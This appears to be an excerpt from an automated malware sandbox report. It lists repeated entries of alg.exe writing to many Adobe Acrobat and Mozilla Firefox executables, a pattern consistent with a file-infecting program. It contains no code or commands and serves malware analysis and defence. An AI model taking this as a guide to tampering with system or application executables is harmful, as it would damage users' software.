Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
